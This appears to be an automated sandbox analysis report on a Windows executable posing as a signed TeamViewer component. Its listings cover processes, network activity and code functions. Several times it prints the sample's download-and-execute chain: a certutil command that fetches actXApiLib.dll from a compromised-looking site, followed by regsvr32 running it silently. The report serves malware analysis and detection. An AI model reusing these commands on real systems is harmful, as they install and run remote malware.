Source: https://www.christchurchmvl.org/volunteer/actXApiLib.dll |
Virustotal: Detection: 11% |
Perma Link |
Source: cBQPecnQRp.exe |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE |
Source: unknown |
HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2 |
Source: cBQPecnQRp.exe |
Static PE information: certificate valid |
Source: |
Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe |
Source: |
Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00466410 FindFirstFileExW, |
1_2_00466410 |
Source: C:\Windows\SysWOW64\certutil.exe |
Network Connect: 100.26.95.170 187 |
Jump to behavior |
Source: C:\Windows\SysWOW64\certutil.exe |
Domain query: www.christchurchmvl.org |
|
Source: Joe Sandbox View |
ASN Name: AMAZON-AESUS AMAZON-AESUS |
Source: Joe Sandbox View |
JA3 fingerprint: ce5f3254611a8c095a3d821d44539877 |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49773 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49772 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49773 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49772 -> 443 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 11:47:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://ocsp.comodoca.com0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://ocsp.digicert.com0C |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://ocsp.digicert.com0O |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://ocsp.sectigo.com0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: http://www.digicert.com/CPS0 |
Source: cBQPecnQRp.exe |
String found in binary or memory: https://sectigo.com/CPS0 |
Source: certutil.exe, 0000000A.00000002.776165001.0000000000550000.00000004.00000020.sdmp |
String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dll |
Source: certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmp |
String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dllC: |
Source: cBQPecnQRp.exe |
String found in binary or memory: https://www.digicert.com/CPS0 |
Source: unknown |
DNS traffic detected: queries for: www.christchurchmvl.org |
Source: global traffic |
HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: www.christchurchmvl.org |
Source: global traffic |
HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: www.christchurchmvl.orgCache-Control: no-cache |
Source: unknown |
HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2 |
Source: cBQPecnQRp.exe |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
Jump to behavior |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004340B0 |
1_2_004340B0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00432A00 |
1_2_00432A00 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0049C051 |
1_2_0049C051 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0046207C |
1_2_0046207C |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004520EB |
1_2_004520EB |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402080 |
1_2_00402080 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004961AB |
1_2_004961AB |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004321AB |
1_2_004321AB |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402210 |
1_2_00402210 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004443F0 |
1_2_004443F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048C4C0 |
1_2_0048C4C0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004744D0 |
1_2_004744D0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0049E4E7 |
1_2_0049E4E7 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004024F2 |
1_2_004024F2 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004685D0 |
1_2_004685D0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00484580 |
1_2_00484580 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004025A0 |
1_2_004025A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048E620 |
1_2_0048E620 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402700 |
1_2_00402700 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045A7C0 |
1_2_0045A7C0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00484790 |
1_2_00484790 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402850 |
1_2_00402850 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00424970 |
1_2_00424970 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004029E0 |
1_2_004029E0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402B70 |
1_2_00402B70 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00464CC9 |
1_2_00464CC9 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402CF0 |
1_2_00402CF0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00402E70 |
1_2_00402E70 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048CFC0 |
1_2_0048CFC0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0049901A |
1_2_0049901A |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045B2E0 |
1_2_0045B2E0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004773C0 |
1_2_004773C0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00401390 |
1_2_00401390 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00433450 |
1_2_00433450 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004454F0 |
1_2_004454F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0046B48F |
1_2_0046B48F |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004514A0 |
1_2_004514A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004014B0 |
1_2_004014B0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045154D |
1_2_0045154D |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00433569 |
1_2_00433569 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004755F0 |
1_2_004755F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0046B5AF |
1_2_0046B5AF |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00401610 |
1_2_00401610 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00493680 |
1_2_00493680 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00401760 |
1_2_00401760 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048D7F0 |
1_2_0048D7F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004337A0 |
1_2_004337A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00499809 |
1_2_00499809 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004518BF |
1_2_004518BF |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0048B9A0 |
1_2_0048B9A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 00421740 appears 48 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 0044FEB0 appears 40 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 0044F762 appears 75 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 00420FA0 appears 63 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: String function: 0044F26F appears 71 times |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044E3F5 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, |
1_2_0044E3F5 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Process Stats: CPU usage > 98% |
Source: cBQPecnQRp.exe |
Binary or memory string: OriginalFilename vs cBQPecnQRp.exe |
Source: cBQPecnQRp.exe, 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe |
Source: cBQPecnQRp.exe |
Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe |
Source: cBQPecnQRp.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: cBQPecnQRp.exe |
Virustotal: Detection: 10% |
Source: cBQPecnQRp.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\cBQPecnQRp.exe 'C:\Users\user\Desktop\cBQPecnQRp.exe' |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' |
Jump to behavior |
Source: classification engine |
Classification label: mal72.evad.winEXE@8/1@2/1 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00422D90 LoadResource,LockResource,SizeofResource, |
1_2_00422D90 |
Source: C:\Windows\SysWOW64\certutil.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\certutil.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\certutil.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: cBQPecnQRp.exe |
Static file information: File size 1363448 > 1048576 |
Source: cBQPecnQRp.exe |
Static PE information: certificate valid |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: cBQPecnQRp.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: |
Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe |
Source: |
Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: cBQPecnQRp.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00434A6C push eax; ret |
1_2_00434A91 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00410AAA push ss; iretd |
1_2_00410AAB |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044F73C push ecx; ret |
1_2_0044F74F |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00493990 push ecx; mov dword ptr [esp], ecx |
1_2_00493991 |
Source: cBQPecnQRp.exe |
Static PE information: section name: .didat |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
1_2_004A5845 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044E000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
1_2_0044E000 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Last function: Thread delayed |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044C1E6 VirtualQuery,GetSystemInfo, |
1_2_0044C1E6 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00466410 FindFirstFileExW, |
1_2_00466410 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044EE91 IsDebuggerPresent,OutputDebugStringW, |
1_2_0044EE91 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
1_2_004A5845 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004944F0 TlsGetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,TlsSetValue,GetProcessHeap,HeapFree, |
1_2_004944F0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0046619E mov eax, dword ptr fs:[00000030h] |
1_2_0046619E |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_00434891 mov eax, dword ptr fs:[00000030h] |
1_2_00434891 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044ECD5 mov esi, dword ptr fs:[00000030h] |
1_2_0044ECD5 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045D9CF mov eax, dword ptr fs:[00000030h] |
1_2_0045D9CF |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044FE43 SetUnhandledExceptionFilter, |
1_2_0044FE43 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0045976E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
1_2_0045976E |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_0044F8B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
1_2_0044F8B8 |
Source: C:\Windows\SysWOW64\certutil.exe |
Network Connect: 100.26.95.170 187 |
Jump to behavior |
Source: C:\Windows\SysWOW64\certutil.exe |
Domain query: www.christchurchmvl.org |
|
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' |
Jump to behavior |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
1_2_00468B1F |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: EnumSystemLocalesW, |
1_2_00468DC7 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: EnumSystemLocalesW, |
1_2_00468E12 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: EnumSystemLocalesW, |
1_2_00468EAD |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
1_2_00468F40 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW, |
1_2_004691A0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
1_2_004692C6 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW, |
1_2_004693CC |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
1_2_0046949B |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: EnumSystemLocalesW, |
1_2_0046354D |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: GetLocaleInfoW, |
1_2_004639F3 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004A85C0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, |
1_2_004A85C0 |
Source: C:\Users\user\Desktop\cBQPecnQRp.exe |
Code function: 1_2_004A7879 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, |
1_2_004A7879 |